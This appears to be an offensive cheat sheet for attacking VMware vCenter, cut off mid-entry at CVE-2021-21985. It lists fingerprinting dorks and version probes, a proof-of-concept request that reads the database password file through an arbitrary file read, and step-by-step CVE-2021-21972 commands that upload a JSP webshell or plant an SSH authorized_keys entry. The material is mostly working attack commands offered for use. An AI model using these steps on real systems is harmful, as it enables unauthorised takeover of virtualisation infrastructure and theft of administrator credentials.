Vcenter LH Exploit

Common Loophole

Fingerprint Feature

title="+ ID_VC_Welcome +"

Search for Vcenter version

Method 1

route: /sdk/vimServiceVersions.xml

Method 2

By calling the SOAP API of the VMWare Sphere component, I can obtain its version information,XML data is as follows:

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope
    xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <soap:Header>
        <operationID>00000001-00000001</operationID>
    </soap:Header>
    <soap:Body>
        <RetrieveServiceContent
            xmlns="urn:internalvim25">
            <_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
        </RetrieveServiceContent>
    </soap:Body>
</soap:Envelope>

arbitrary file load

Impact version: VMware vCenter Server <=6.5.0

Fofa Dork: title="ID_VC_Welcome"

Vmware Vcenter exists arbitrary file read that can read the manage account password from vCetner configuration to control the vCenter platform.

The database configurate file locate at different directory due to system version.Here is official file shows the location breifly:

vCenter Server 5.5 or lower than 5.5

Windows 2008 - C:\ProgramData\VMware\VMware VirtualCenter

Other Windows version - C:\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\

vCenter Server 6.0 6.5 6.7

C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx

POC:

1 2	`GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1` `Host: {{Hostname}}`

CVE-2021-21972

Enabled by default vROps plugin(com.vmware.vropspluginui.mvc) unauthorized access the ServicesController class uploadova interface,can use the path through the file decompression to realize getshell specifc directory.

Impact version:

7.0 <= vCenter Server < 7.0 U1c
6.7 <= vCenter Server < 6.7 U3l
6.5 1e <= vCenter Server < 6.5 U3n
4.x <= Cloud Foundation (vCenter Server) < 4.2
3.x <= Cloud Foundation (vCenter Server) < 3.10.1.2

1	`/ui/vropspluginui/rest/services/uploadova`

The vulnerability don't exists if access the path above with 404,but 405 means it may be a vulnerability.

Windows machine:

https://github.com/horizon3ai/CVE-2021-21972.git

python CVE-2021-21972.py -t x.x.x.x -p ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\gsl.jsp -o win -f gsl.jsp
 
-t （目标地址）
-f （上传的文件）
-p （上传后的webshell路径，默认不用改）

The upload path is https://x.x.x.x/statsreport/gsl.jsp

Completely path is

1	`C:/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport`

Linux machine

1.Write public/secret key( need 22 port open)

1	`python3 CVE-2021-21972.py -t x.x.x.x -p /home/vsphere-ui/.ssh/authorized_keys -o unix -f id_rsa_2048.pub`

CVE-2021-21985

Enabled by default Virtual SAN Health Check plugin (vsan-h5-client.zip) unauthenticated access the /rest/* interface,can use unsafe reflection calls implement RCE.

Impact version: